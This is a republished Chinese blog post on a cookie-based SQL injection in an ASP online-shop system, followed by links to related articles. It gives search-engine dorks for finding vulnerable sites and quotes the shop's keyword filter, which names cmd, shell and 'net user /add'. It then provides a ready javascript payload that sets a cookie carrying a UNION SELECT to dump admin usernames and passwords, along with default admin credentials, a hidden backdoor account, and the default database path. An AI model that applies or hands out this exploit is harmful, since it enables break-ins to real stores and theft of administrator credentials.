hellxman讲解asp网上商城cookies注入漏洞

电玩女神 2022-01-11 18:45 101阅读 0赞

关键字: inurl:sort.asp?sort\_id=  
或者 inurl:pinpai.asp?pinpai\_id=  
  
'表单数据初步判断，检验\*\*\*语句  
Code:  
Form\_Badword="%20or%20|'|""|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"  
if request.form<>"" and uBits ="" then  
Chk\_badword=split(Form\_Badword,"|")  
FOR EACH name IN Request.Form  
for i=0 to ubound(Chk\_badword)  
If Instr(LCase(request.form(name)),Chk\_badword(i))<>0 Then  
showerr "e"  
End If  
NEXT  
NEXT  
end if  
  
'参数初步判断，检验\*\*\*语句  
Query\_Badword="%20or%20|'|""|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"  
if request.QueryString<>"" then  
Chk\_badword=split(Query\_Badword,"|")  
FOR EACH Query\_Name IN Request.QueryString  
for i=0 to ubound(Chk\_badword)  
If Instr(LCase(request.QueryString(Query\_Name)),Chk\_badword(i))<>0 Then  
showerr "e"  
End If  
NEXT  
NEXT  
End if  
  
http://127.0.0.1/sort.asp?sort\_id=1

//没检测cookies你懂的
    
    Exp:
    javascript:alert(document.cookie="sort_id="+escape("1 and 1=2 union select 1,admin_name,admin_pass,4,5,6,7 from ad_admin")) 
    
    后台数据库可以备份你懂的~！！！！！
    需要NC 调用 不懂参考http://www.2cto.com/Article/201106/92845.html
    
    默认管理账户密码 admin admin888
    
    还有个隐藏账户    swit     xuxinyao999
    后门?
    
    默认数据库地址 Database/shopdata.mdb

转载于:https://blog.51cto.com/hellxman/750639

发表评论取消回复

表情：

评论列表（有 0 条评论，101人围观）

还没有评论，来说两句吧...

相关阅读

相关网上图书商城网上书店系统（jsp+mysql）

目　　录中文摘要 3 英文摘要 4 目录 5 第一章绪论 7 1.1 课题背景、目的及意义 7 1.1.1课题背景 7 1.1.2课题目的和意义

古城微笑少年丶/ 2024年03月31日 12:07/ 0 赞/ 135 阅读

相关网上商城 xm-mall

介绍 xm-mall是基于springboot搭建的网上商城，响应式项目地址：[https://github.com/chy18883701161/xm-mall][

痛定思痛。/ 2023年02月21日 04:58/ 0 赞/ 41 阅读

相关 Javaweb实现网上商城

![首页][format_png] ![登录][format_png 1] ![注册][format_png 2] ![详情页][format_png 3] !

Bertha 。/ 2022年11月13日 06:27/ 0 赞/ 472 阅读

相关网上商城——总结

前言最近在学习网上商城这个项目，总结一下在学习过程中遇到的问题。错误 1一开始的时候遇到的错误端口占用 ![Center][] 解

旧城等待，/ 2022年07月12日 10:36/ 0 赞/ 377 阅读

相关网上商城——在线支付

概念在线支付是指卖方与买方通过因特网上的电子商务网站进行交易时，银行为其提供网上资金结算服务的一种业务。它为企业和个人提供了一个安全、快捷、方便的电子商务应

柔情只为你懂/ 2022年07月12日 08:15/ 0 赞/ 383 阅读

相关 SQL注入系列之ASP+ACCESS手动注入(二)----Cookie注入

一、简介 Cookie的定义是这样的：Cookie是在HTTP协议下，服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪

àì夳堔傛蜴生んèń/ 2022年07月10日 10:27/ 0 赞/ 431 阅读

相关 Cookies【ASP.NET】

前言我们都知道HTTP协议是无状态的，无论客户端还是服务端都没有必要记录彼此过去的行为。但是很快人们发现，有些请求记录一下，会更加方便我们，于是就出现了这种客户端和服务

待我称王封你为后i/ 2022年03月07日 15:10/ 0 赞/ 186 阅读

相关 hellxman讲解asp网上商城cookies注入漏洞

关键字: inurl:sort.asp?sort\_id= 或者 inurl:pinpai.asp?pinpai\_id= '表单数据初步判断，检验\\\语句

电玩女神/ 2022年01月11日 18:45/ 0 赞/ 102 阅读

相关 PHPCMS V9 (plugin.php)本地文件包含漏洞hellxman

影响版本: PHPCMS V9.1.8 (20111014) 漏洞描述: 由于文件/plugin.php对于用户提交的变量未过滤，导致本地文件包含

喜欢ヅ旅行/ 2022年01月11日 18:43/ 0 赞/ 3312 阅读

相关图书网上商城blog

测试与部署首页图 ![1503978-20190618181802777-1373210465.png][] 注册页面图 ![1503978-201906181819

雨点打透心脏的1/2处/ 2022年01月07日 09:21/ 0 赞/ 342 阅读